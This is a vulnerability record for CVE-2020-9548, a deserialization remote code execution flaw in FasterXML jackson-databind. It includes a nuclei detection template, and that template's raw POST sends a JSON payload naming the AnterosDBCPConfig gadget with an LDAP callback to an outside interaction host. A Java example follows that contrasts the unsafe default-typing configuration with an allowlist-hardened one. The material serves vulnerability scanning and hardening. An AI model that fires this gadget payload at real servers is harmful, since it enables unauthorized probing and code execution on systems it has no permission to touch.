Vulnerability information
Vulnerability name: FasterXML Jackson Databind Remote Code Execution Vulnerability
Vulnerability ID:
Vulnerability type: deserialization
Severity: critical
Description: FasterXML Jackson Databind is a popular Java library for serializing Java objects to JSON and deserializing JSON back into Java objects. It is used throughout Java applications, particularly for handling JSON data in web services, so a vulnerability in the library can affect a large number of applications and services. This vulnerability affects FasterXML jackson-databind 2.x up to 2.9.10.4, which mishandles the interaction between serialization gadgets and typing, in particular the part related to br.com.anteros.dbcp.AnterosDBCPConfig (also known as anteros-core). The root cause of this deserialization flaw is that the library does not properly validate and restrict the input it deserializes, so an attacker can craft malicious JSON that names a specific class and uses a serialization gadget chain to execute remote code. The impact is severe: an attacker can execute arbitrary code on the target system, potentially leading to full system compromise, data theft, or service disruption. The vulnerability can be exploited without authentication and triggered remotely, which makes attacks easy to automate and carry out at scale.
Vendor: fasterxml
Product: jackson-databind
Affected versions: 2.x <= 2.9.10.4
Source: https://github.com/projectdiscovery/nuclei-templates/blob/2e403faa7883debf7116bed29e8c86c10af1c37d/http%2Fcves%2F2020%2FCVE-2020-9548.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details
```yaml
id: CVE-2020-9548

info:
  name: FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution
  author: tomaquet18
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9548
    - https://github.com/fairyming/CVE-2020-9548
    - https://www.sangfor.com/blog/cybersecurity/fasterxml-jackson-databind-remote-code-execution-vulnerability-cve-2020-9548
    - https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E
    - https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9548
    cwe-id: CWE-502
    epss-score: 0.13945
    epss-percentile: 0.93967
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fasterxml
    product: jackson-databind
  tags: cve,cve2020,jackson,fasterxml,rce

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [
          "br.com.anteros.dbcp.AnterosDBCPConfig",
          {
            "healthCheckRegistry": "ldap://{{interactsh-url}}"
          }
        ]

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
        internal: true

    extractors:
      - type: dsl
        dsl:
          - "BaseURL"
```
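The request above only does anything when the target application has enabled Jackson's default typing, which lets the first element of a JSON array name the class to instantiate. The following Java snippet is an added illustration (it is not part of the nuclei template, nor Jackson's own documentation) of the weak 2.9-era configuration next to a hardened one that only activates default typing behind an allowlist PolymorphicTypeValidator (jackson-databind 2.10+); the package name com.example.model and the LDAP URL are placeholders.

```java
import com.fasterxml.jackson.core.JsonProcessingException;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingHardening {

    // Constructed sample: same array-form payload shape as the template above.
    // The first element is the type id Jackson resolves when default typing
    // is active; the LDAP URL is a placeholder, not a real callback host.
    static final String PAYLOAD =
        "[\"br.com.anteros.dbcp.AnterosDBCPConfig\","
        + "{\"healthCheckRegistry\":\"ldap://placeholder.invalid/x\"}]";

    // WEAK (jackson-databind 2.x before 2.10): global default typing with no
    // validator. Any class on the classpath may be named in the type wrapper,
    // so the only guard is Jackson's reactive blocklist, which CVE-2020-9548
    // bypassed via AnterosDBCPConfig. Shown only for contrast; do not use.
    static ObjectMapper weakMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); // deprecated in 2.10
        return mapper;
    }

    // HARDENED (jackson-databind 2.10+): default typing is activated only with
    // an allowlist validator. Only subtypes under the application's own model
    // package (placeholder com.example.model) are accepted as type ids; any
    // other class name, gadget or not, is refused before it is instantiated.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType("com.example.model.")
            .build();
        return JsonMapper.builder()
            .activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL)
            .build();
    }

    // True when the mapper refuses the payload at the type-id stage. With the
    // hardened mapper this is an InvalidTypeIdException (a JsonMappingException)
    // regardless of whether the anteros-core jar is present on the classpath.
    static boolean rejectsPayload(ObjectMapper mapper) {
        try {
            mapper.readValue(PAYLOAD, Object.class);
            return false;
        } catch (JsonMappingException e) {
            return true;
        } catch (JsonProcessingException e) {
            return false; // malformed JSON, not a type-id rejection
        }
    }

    public static void main(String[] args) {
        System.out.println("hardened mapper rejects payload: " + rejectsPayload(hardenedMapper()));
    }
}
```

Upgrading to a jackson-databind release that blocklists this gadget is the minimum fix; the allowlist configuration above is what stops the next gadget class as well.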